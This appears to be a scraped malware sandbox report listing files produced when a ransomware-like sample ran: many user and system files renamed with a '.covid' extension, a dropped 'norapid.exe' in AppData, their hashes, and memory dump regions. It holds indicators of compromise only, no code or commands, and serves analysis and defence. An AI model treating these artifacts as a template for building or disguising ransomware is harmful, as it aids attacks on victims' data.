05b408b4441dee9f53d307d4ffde9655b1ddb9423c60c18908c7031fa954b0bef90868e135e8a4e9a78fc2e2ca976f3f4c6fbee39aa5c47b501acfa1b1d0154f

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\MDKB4QCINR.covid
MD5
2f526f67e3e3310b76062a62d0017861

SHA1
c2379bfca73d72d579226ce3ed31721aa29e7406

SHA256
70c3036d733765ff6b5b90181e07370b9af2f125af97025d71199b500cc9f353

SHA512
69ee7cfd595ec6e9d3b0ebf0810fc138aadd13b2c91f3f4f6c68ef1c911cf1490f2bcd622dae72be33d0d99bb161a8de1f64fd5e1b2c7b2f7b14e526914870f8

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\ROKWTEUTZV.covid
MD5
f0e6a24a976cd05b934e274311e37f9e

SHA1
18889b2ae7529f6390b6f69f98e19473cf764875

SHA256
5a9df9d0cda20dab56b7f3f8b3f05e948dc3f25a1017f55e223de8e4fec330eb

SHA512
c4f17c2932929ba547c86c9274cf20fa2872dcbd46cef7d2d99d88ffaabfaecea0cd41167f9610a57999660fab4cf8d50859c84a157c98edfe9808cec5d70dba

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\SQ545CMYFJ.covid
MD5
16644d90ed812b40e85c73b8ddc5d65b

SHA1
9f41bab01e19b4c7cc5a4eb562ddf80c6de7c578

SHA256
065ef86db402f091823d310568bed06b9f431957f51ef42a4d4be694bc3dc6fd

SHA512
5da97279db356ac41a77b69d57af77b61a814bf9a902083581bdb3492777647d8bb52e79933165deb755531fe5ab4fb41f0d35b4e7c6835dcb6c213eac10cf40

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\TIT2AY7OFZ.covid
MD5
c0f70c800fcb5988ec90dd33863e83b9

SHA1
f8f5b5339088785e52b8839d3b905d81d40c927c

SHA256
8e6058e2adcc5bb3724abdc8cd51e5700759b6cdcd2fb54959161d350830db6d

SHA512
0e33eaaab8a7bff4bccae10ccee04b2b859b5ef9601e0ff019b0a88c4b2c5b0c7be5d22bac28b6c84efa912b9d8ac6d68a73a3d1424635f719fb5c2682dd23c4

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\UFAJCD2GOT.covid
MD5
4b72de7c455756c5ce41193c61ceada5

SHA1
dbdd46b5f7a6094cec87df6e4e03656ddbae81bd

SHA256
5ab1f49205ebb074038942a7ef37ef46685e0c9b291b126690201c9d9910c638

SHA512
ab077d40dc29b46c178ac098bb9e28537797bc507472f19717b77aec01b36c74dea8eebadb62d7f124db229fdac8827013a640caee70b65a12a5addff2372cad

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\VSMLJCQ3ZJ.covid
MD5
dd177f72067b56ac540984996fac0f55

SHA1
44c79b272e2df6ff91926362dc2c625e5289383f

SHA256
a6333a1557e15b735bcf8b9a405bd6eccbc47c6438a1b3dfaba5df119120a751

SHA512
bb5caf44de39d9d34651ae202f8d586100b206edd812dcc2905337b53ec0b07b947f16e58bd523daf5d7d6f3137087fbe9cca7c8281f5b65eb2208fbdff0a674

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\WB7JZH5V83.covid
MD5
11d766f76d4b10c564111e30a7195b04

SHA1
0da78677cf291baef30d8d5d95bb0e36bd23671c

SHA256
abc85b0ca5bd6e738fbf36aff08ad6b27f51f75a99f0520bb704f199ce14de6f

SHA512
1de0147ea932b679a3101a809651044a5116c71ac7c4ef6a01f608b28b143d046a7152bb6d0251fb5d1ddce62cfb8ffd9bd3704d1558c92f1049a7444b1a5db9

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\X7YEGRMLQE.covid
MD5
b70b7496748c3af6eee521464def707a

SHA1
65e8740f388661624c732fb5afca79669ef9fcf9

SHA256
c94e2f638dfc2fccf6135a56806089abec48c90e8e2f39208594a901964c2f03

SHA512
60e94c4bdbbb32e6edd17482243dd06c0ff92133a784e9d493f1534a14903b42eb3e66f9875d64bd177d3886db1d032e21db7172ef3a0d030f1002629b7886d9

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\ZXGRCG3WKI.covid
MD5
f22ec3456523541242740ddf9a0df811

SHA1
d40c842aff793d04bc6d28fa329ae9322a861805

SHA256
15c670ab55d57cac65b2bdafadd3427da59f7c1434e4885afcef0f505ce7aa4c

SHA512
a7b82499372601c8ba9e0d203f7f8aa6bd9a3ee81613010111ac2f76e5b02f208ce27d31662ec6101836c59f601ed1f0ab18ff670256d089ebe745277e9165f9

Download Submit
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\5YAIZ5QT3X.covid
MD5
2b13016ada096487a06e4dd9627f0613

SHA1
57a5dafc51f79ae4bf4ebf2c71c8a8f8b4b55a03

SHA256
3991109997ecef375826277894e085295f001922be1c3e1aa97e146e32283eb1

SHA512
e64e38b26c6d8df8f0973ab5b83a8e7f34731a35a3a363ea88c1d09ad7f68c7a32d60a9e74c749db880bbccae23780a9c9a30a111569646160dc668e7395728d

Download Submit
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\HAPM8W6RBA.covid
MD5
69773f353c1bf045297951bf76345acc

SHA1
5422dea17bd2e3d0e32955b86bd55e01bb182f8c

SHA256
f554b23b386ca2b1a6b04da4602df585972e73ba3a931be1a2031d53dfcd657b

SHA512
7f2d6c70b36db27d455fa82ca0996431523cb38ef4788eb3e227a2d538a733e0a78556ef82bbd351d6b1f7d13e89a3844433feb3c5597a01c914e8d1ecc82467

Download Submit
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\HLIF2GL28A.covid
MD5
f181cd9ebdb1c4889207503924678dbc

SHA1
9a53c6da9f215493605350b5ba083f104d3d07a1

SHA256
38911f55d0ab024c247d52e3becefa701b91d05596d919832c40271cb6d04389

SHA512
27cc615919e876adac0a65dda25a4452a9f0f32bf3deda1c18d7a27f23f68487681548cb949dc9f0d90bd1bbeee83609bb0cedef26163b55fa859ee86ac79681

Download Submit
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\IJWGQQ5AUE.covid
MD5
dc06f07a37ae53f7cc1e16953be3a438

SHA1
1ac3565971fb446b11aa519413ad8bb548498f0a

SHA256
2c7349a2934cf5742afd4a8006e64e5bc7392163141264295908e098663eb18a

SHA512
79f5be2bceec3311f6378684a567e90b731088ad6dc973291f3f1135f2b65be1e37f4dcf45b453629f3f6bec807ed04cf989d18ba37513f9711007f0693a0ed5

Download Submit
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\NCWPLHTRX5.covid
MD5
33b9c03597740fa1905be44a3dee411b

SHA1
0f6c693103485f0e7a2df5af94c24bf7bfef22a4

SHA256
645e37f525b88109ae076588ae4937bb1d40a490cecbbec7c61cea4311ea4ce3

SHA512
23845797bcd71d4f7cf9a28879420b9a31ff68be9c10174b52b6c62429654ea10be0201ee811686f8368e61b80e8253c11072c79942c3f3cd7fd90edbe7353e5

Download Submit
C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\VNJNTBLANY.covid
MD5
4cc7cb63f618aa683b8383d58c4750a2

SHA1
d74a7e637720c91825811dd4ddf737eb33bb12c1

SHA256
2f10d910167b40fb13266a1c22d231c062f7d537447dc9eefb518eca76edf70e

SHA512
23342ee217661471bddd84a7c0d7565bc24064db496c52aeb0e69b96853c96d46851acc773e148e9283daea71866f08a4863aab397558425889dc00f6c7e718a

Download Submit
C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\22Z68PDI85.covid
MD5
5914c5b541a7c9dc446a008ab5ddff5e

SHA1
c366c23706f3e26e01a10e39aba6f7904aa1897a

SHA256
94c1f11d5b46bc45343c4e19992858a453bd419ba43d10ca94ad8ad38c40fd33

SHA512
386a44c47be083d36a4bf7b06750083cd498ae8d88b2b6fadfb306e9261f7ecd1d8245bf42229479f4cd9a695a8d11d79baf7bfab50ad16f4416ba4b8451f663

Download Submit
C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\O3J71568VP.covid
MD5
4d5199aaf5834cf1b93ac7b882298278

SHA1
45241304f4590b319b3553e91fb0649ade8e957d

SHA256
2f4833dbdfaa50580c3183e2fb0e8183f9831d8027bc8dea9e76cf8448ba7112

SHA512
4c280d77f26cff3efdc844dd39a7a4df1d37ba0473a59d7e44649ba6de2876c0c0ea03ac4605ec2e32d8908ad73f1b413a6af7954138f04bf9c44256fc1ef4e4

Download Submit
C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\Q5PERPZCTQ.covid
MD5
54b689639483275695e1cfb4a30843b5

SHA1
c47781f655aa7c001cc748f9de17c5d9cbc00672

SHA256
1c810189d8dc53cc19bb396810d5d610c76a9f6fd1d9800fd2f4497587a66076

SHA512
1d1ec8625634b883081d02f5b2b2bfea46ac24a16e598375aab97827ea4064800002c97a216d8cbd7688beb7f66be7d0ce77409290665e9af6949ea26781a4e9

Download Submit
C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\XS1RUGNQ7F.covid
MD5
9144c872e53c7570a8d949959ab525fc

SHA1
eb8ce4eda6b59e26bb572455b6e495f91dfdeaa7

SHA256
4c04feb4c8f3117a8612b0a8be5823427edb65cc3dfe5339d43e4908a2ad012c

SHA512
6b49e0d416f16f8db40be44cc3edc0508cf03afbdd2b155e2ec85b6c511a402f95a38505d4c54798eba1935adb4b7f1b2344824fc693193a42793c097bfc45a4

Download Submit
C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\FFPK1CD3TO.covid
MD5
0c0ba5c4ba93031be57b94ec64539067

SHA1
fb8681ced153c9d8a12125ed025066dda82c60e4

SHA256
5979f1cc6456922ea3caec6b49c5d92d21f858943bbd8ce26eddbb8c017248fc

SHA512
c1c9f598e99c17a4f2ef725d1f2e72484ff8dde4d416992642a500482961a8972d81ad66ead1ee8a63a698b59029141c87850052805615cf4184df1243c43fb9

Download Submit
C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\MDKB4QCINR.covid
MD5
dbd8455e75c2d9658b95d7c62d9ccffc

SHA1
03253e688c1a5ae75e3ff58346cc50a4193ba059

SHA256
a54d16952cac39d3d0b04917c860f15296f508cb5ee6c0834f0184d6af0dab7a

SHA512
29e2d68305a3a5d9a8274d8abee3a875ff77c02eb99523ccce12282f9b3dfbddac12ace896fb1c1ca4398fc5a9d004a823e3d1747b77a46ae240324b11687881

Download Submit
C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\XP57OPTB6W.covid
MD5
e7787b30bf0711c5c6d0ad020aa57795

SHA1
c32ae36802ddb4fe8e00206df387fdd34d05ac97

SHA256
749b9f6d4236b278c48af45f9aa3ebd6d36b9b11eb1387ea8f9f5615e608fc4e

SHA512
32eae1aa18e6d893d2a45ded3a19009650348b78540532b2cff784bf7d8978f53c3944339d12c7ae6ea442c30862b5c655227d250266b20510a22b738e190176

Download Submit
C:\NCWPLHTRX5.covid
MD5
16825e740e82d44c6cd2d75a2ee991be

SHA1
bbc85a495ed9a74f7bc83ea3f9940a4969d225bb

SHA256
c577385dd7c202be5dbf6141c11375643d32ad7cd3a4bed5ec70caf8d05c4c49

SHA512
88ebebddc4a5220f32308121f70e567f3c605b6a44390744b499752932bddcb462fa8245a6680fd0187467de4b70ebee331f9427fc0bd048f52c99ddf7f2c6d8

Download Submit
C:\Recovery\4537d782-9a0d-11eb-a52e-c2ebb310cb62\HFKO2QUQAS.covid
MD5
fcdc5495e373007be27f7b495f409094

SHA1
d359210aab68e2290e97f44f78de7f95129e4f02

SHA256
f36d1800d0437395cbfa8c30297773d41907a18cef33a04f8e4ed8a192f8ebf1

SHA512
df4f2bff22047c8cd79d78eae59272531be2dd130fddf36806bc2e53fcc46772a9a69705bfd7d0b679b5a76a4b3e79bc28953d69a6130b737b0e95c5a39a4003

Download Submit
C:\Recovery\4537d782-9a0d-11eb-a52e-c2ebb310cb62\LJM5WIC7Z1.covid
MD5
6be116a190da6adfbab6d7ee4534d0e1

SHA1
3c383d50059efa5a5c73fe7aa83f4131d9ed63e6

SHA256
be71336ccb99a70aa0763266a0792c3a973443d0abc3fe512b2b409e35d0982a

SHA512
51f3dc001d1921e12a28b9326ab43dfa79a92efdba97401480d5efcf662a05ebc1f1f7ccac531a499e2b8dcc685f6584133fd5f13f1bbaafb6efb2e962b5c873

Download Submit
C:\Users\Admin\AppData\Roaming\norapid.exe
MD5
c5d02a59e543e126359998b982e87d45

SHA1
e6960b254e0215493a29471949b1ff84b6da1b59

SHA256
074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51

SHA512
6fc4f510ab3f13e0ab49d0b46b4b7a440de33b693ba6d20c6459dd59721363fbbda59975a51f78fa85d2f452fcc519595b83d80ae580c00ab75d80adbc214721

Download Submit
C:\Users\Admin\AppData\Roaming\norapid.exe
MD5
c5d02a59e543e126359998b982e87d45

SHA1
e6960b254e0215493a29471949b1ff84b6da1b59

SHA256
074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51

SHA512
6fc4f510ab3f13e0ab49d0b46b4b7a440de33b693ba6d20c6459dd59721363fbbda59975a51f78fa85d2f452fcc519595b83d80ae580c00ab75d80adbc214721

Download Submit
C:\XS1RUGNQ7F.covid
MD5
82304dadf905072f298a2d793eaa19f4

SHA1
4be6cf9e97e8a0389d5e48637b558f1579b08625

SHA256
153568227e80de44780e002ca81a71359c0bc770da16cb81ed7eaad9a40d4a6a

SHA512
cde6719cc2acb469d5ea012c21d74876f7529d235406a61206e87d823ecb41e3229192e872597ddaf8c18502e839f2942f4a6d9a01eee1293b06344eb3d8d289

Download Submit
memory/316-66-0x0000000000000000-mapping.dmp

Download
memory/556-68-0x0000000000000000-mapping.dmp

Download
memory/732-70-0x0000000000000000-mapping.dmp

Download
memory/788-73-0x0000000000220000-0x000000000023E000-memory.dmp

Filesize
120KB

Download
memory/788-60-0x0000000075551000-0x0000000075553000-memory.dmp

Filesize
8KB

Download
memory/788-74-0x0000000000400000-0x0000000000990000-memory.dmp

Filesize
5.6MB

Download
memory/912-71-0x0000000000000000-mapping.dmp

Download
memory/1004-81-0x0000000000000000-mapping.dmp

Download
memory/1056-69-0x0000000000000000-mapping.dmp

Download
memory/1180-75-0x0000000000000000-mapping.dmp

Download
memory/1328-63-0x0000000000000000-mapping.dmp

Download
memory/1384-62-0x0000000000000000-mapping.dmp

Download
memory/1440-65-0x0000000000000000-mapping.dmp

Download
memory/1468-72-0x0000000000000000-mapping.dmp

Download
memory/1520-64-0x0000000000000000-mapping.dmp

Download
memory/1524-80-0x0000000000000000-mapping.dmp

Download
memory/1600-83-0x0000000000000000-mapping.dmp

Download
memory/1604-78-0x0000000000000000-mapping.dmp

Download
memory/1644-77-0x0000000000000000-mapping.dmp

Download
memory/1644-194-0x000007FEFBC81000-0x000007FEFBC83000-memory.dmp

Filesize
8KB

Download
memory/1684-84-0x0000000000000000-mapping.dmp

Download
memory/1704-61-0x0000000000000000-mapping.dmp

Download
memory/1720-67-0x0000000000000000-mapping.dmp

Download
memory/1804-79-0x0000000000000000-mapping.dmp

Download
memory/1852-82-0x0000000000000000-mapping.dmp

Download
memory/1920-76-0x0000000000000000-mapping.dmp

Download
memory/2080-85-0x0000000000000000-mapping.dmp

Download
memory/2104-120-0x0000000000000000-mapping.dmp

Download
memory/2108-86-0x0000000000000000-mapping.dmp

Download
memory/2136-87-0x0000000000000000-mapping.dmp

Download
memory/2148-121-0x0000000000000000-mapping.dmp

Download
memory/2172-88-0x0000000000000000-mapping.dmp

Download
memory/2192-89-0x0000000000000000-mapping.dmp

Download
memory/2224-90-0x0000000000000000-mapping.dmp

Download
memory/2248-91-0x0000000000000000-mapping.dmp

Download
memory/2256-122-0x0000000000000000-mapping.dmp

Download
memory/2284-92-0x0000000000000000-mapping.dmp

Download
memory/2304-93-0x0000000000000000-mapping.dmp

Download
memory/2332-94-0x0000000000000000-mapping.dmp

Download
memory/2344-123-0x0000000000000000-mapping.dmp

Download
memory/2364-95-0x0000000000000000-mapping.dmp

Download
memory/2392-96-0x0000000000000000-mapping.dmp

Download
memory/2424-97-0x0000000000000000-mapping.dmp

Download
memory/2460-98-0x0000000000000000-mapping.dmp

Download
memory/2468-124-0x0000000000000000-mapping.dmp

Download
memory/2484-99-0x0000000000000000-mapping.dmp

Download
memory/2504-100-0x0000000000000000-mapping.dmp

Download
memory/2540-101-0x0000000000000000-mapping.dmp

Download
memory/2560-125-0x0000000000000000-mapping.dmp

Download
memory/2568-102-0x0000000000000000-mapping.dmp

Download
memory/2588-103-0x0000000000000000-mapping.dmp

Download
memory/2628-104-0x0000000000000000-mapping.dmp

Download
memory/2652-105-0x0000000000000000-mapping.dmp

Download
memory/2668-126-0x0000000000000000-mapping.dmp

Download
memory/2680-106-0x0000000000000000-mapping.dmp

Download
memory/2712-107-0x0000000000000000-mapping.dmp

Download
memory/2740-108-0x0000000000000000-mapping.dmp

Download
memory/2772-109-0x0000000000000000-mapping.dmp

Download
memory/2800-110-0x0000000000000000-mapping.dmp

Download
memory/2820-111-0x0000000000000000-mapping.dmp

Download
memory/2852-112-0x0000000000000000-mapping.dmp

Download
memory/2876-113-0x0000000000000000-mapping.dmp

Download
memory/2908-114-0x0000000000000000-mapping.dmp

Download
memory/2932-115-0x0000000000000000-mapping.dmp

Download
memory/2968-116-0x0000000000000000-mapping.dmp

Download
memory/2992-117-0x0000000000000000-mapping.dmp

Download
memory/3016-118-0x0000000000000000-mapping.dmp

Download
memory/3040-119-0x0000000000000000-mapping.dmp

Download
memory/3120-197-0x0000000000400000-0x0000000000990000-memory.dmp

Filesize
5.6MB

Download
memory/3588-131-0x0000000000400000-0x0000000000990000-memory.dmp

Filesize
5.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads